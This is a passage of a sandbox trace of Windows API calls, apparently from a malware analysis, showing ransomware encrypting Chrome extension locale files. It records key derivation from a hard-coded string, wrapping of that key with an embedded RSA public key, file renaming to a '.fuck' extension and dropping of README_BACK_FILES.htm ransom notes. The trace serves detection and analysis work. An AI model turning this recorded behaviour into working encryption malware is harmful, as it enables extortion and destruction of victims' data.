pInfo=0x2eb2cb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2ce0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2ce8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d7c0) returned 1 [0260.634] CryptEncrypt (in: hKey=0x2e7d7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.634] CryptEncrypt (in: hKey=0x2e7d7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e70e20*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e70e20*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.634] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e70e20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e70e20*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.635] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x11e, lpOverlapped=0x0) returned 1 [0260.636] CryptEncrypt (in: hKey=0x2e7c900, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x11e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0260.636] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0260.636] CloseHandle (hObject=0x5d5c) returned 1 [0260.636] CloseHandle (hObject=0x5d64) returned 1 [0260.636] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), bFailIfExists=0) returned 1 [0260.639] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json", dwFileAttributes=0x0) returned 1 [0260.639] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.gsg")) returned 1 [0260.640] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.fuck")) returned 1 [0260.641] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0260.641] CryptDestroyKey (hKey=0x2e7c900) returned 1 [0260.641] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.641] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.641] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0260.642] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\readme_back_files.htm")) returned 0xffffffff [0260.642] AreFileApisANSI () returned 1 [0260.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.642] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.643] GetFileType (hFile=0x5d60) returned 0x1 [0260.643] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.644] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.644] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.644] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.644] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.644] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.644] GetLastError () returned 0x0 [0260.644] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json")) returned 0x20 [0260.644] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json", dwFileAttributes=0x80) returned 1 [0260.645] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.645] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.646] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.646] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.649] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.649] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.649] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.649] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.649] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.649] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.650] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e70958) returned 1 [0260.650] CryptImportPublicKeyInfo (in: hCryptProv=0x2e70958, dwCertEncodingType=0x1, pInfo=0x2eb2d80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2db0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2db8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d340) returned 1 [0260.650] CryptEncrypt (in: hKey=0x2e7d340, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.650] CryptEncrypt (in: hKey=0x2e7d340, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e712e8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e712e8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.650] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e712e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e712e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.651] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xd2, lpOverlapped=0x0) returned 1 [0260.652] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0260.652] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0260.652] CloseHandle (hObject=0x5d64) returned 1 [0260.652] CloseHandle (hObject=0x5d5c) returned 1 [0260.652] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), bFailIfExists=0) returned 1 [0260.655] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json", dwFileAttributes=0x0) returned 1 [0260.655] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.gsg")) returned 1 [0260.656] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.fuck")) returned 1 [0260.657] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0260.657] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0260.657] CryptReleaseContext (hProv=0x2e6eb10, dwFlags=0x0) returned 1 [0260.658] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0260.658] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0260.658] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\readme_back_files.htm")) returned 0xffffffff [0260.658] AreFileApisANSI () returned 1 [0260.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0260.658] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0260.659] GetFileType (hFile=0x5d60) returned 0x1 [0260.659] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0260.660] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0260.660] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0260.660] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.660] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0260.660] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0260.660] GetLastError () returned 0x0 [0260.660] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json")) returned 0x20 [0260.660] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json", dwFileAttributes=0x80) returned 1 [0260.661] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0260.661] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0260.663] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0260.664] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e6eb10) returned 1 [0260.666] CryptCreateHash (in: hProv=0x2e6eb10, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0260.666] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0260.666] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0260.666] CryptDeriveKey (in: hProv=0x2e6eb10, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ce40) returned 1 [0260.666] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0260.666] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0260.666] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e71508) returned 1 [0260.666] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71508, dwCertEncodingType=0x1, pInfo=0x2eb2e50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb2e80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb2e88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7d800) returned 1 [0260.666] CryptEncrypt (in: hKey=0x2e7d800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0260.666] CryptEncrypt (in: hKey=0x2e7d800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e709e0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e709e0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0260.667] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e709e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e709e0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0260.667] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xde, lpOverlapped=0x0) returned 1 [0260.668] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xde, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0260.668] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0260.669] CloseHandle (hObject=0x5d5c) returned 1 [0260.669] CloseHandle (hObject=0x5d64) returned 1 [0260.669] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), bFailIfExists=0) returned 1 [0260.671] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json", dwFileAttributes=0x0) returned 1 [0260.672] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.gsg")) returned 1 [0260.673] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), 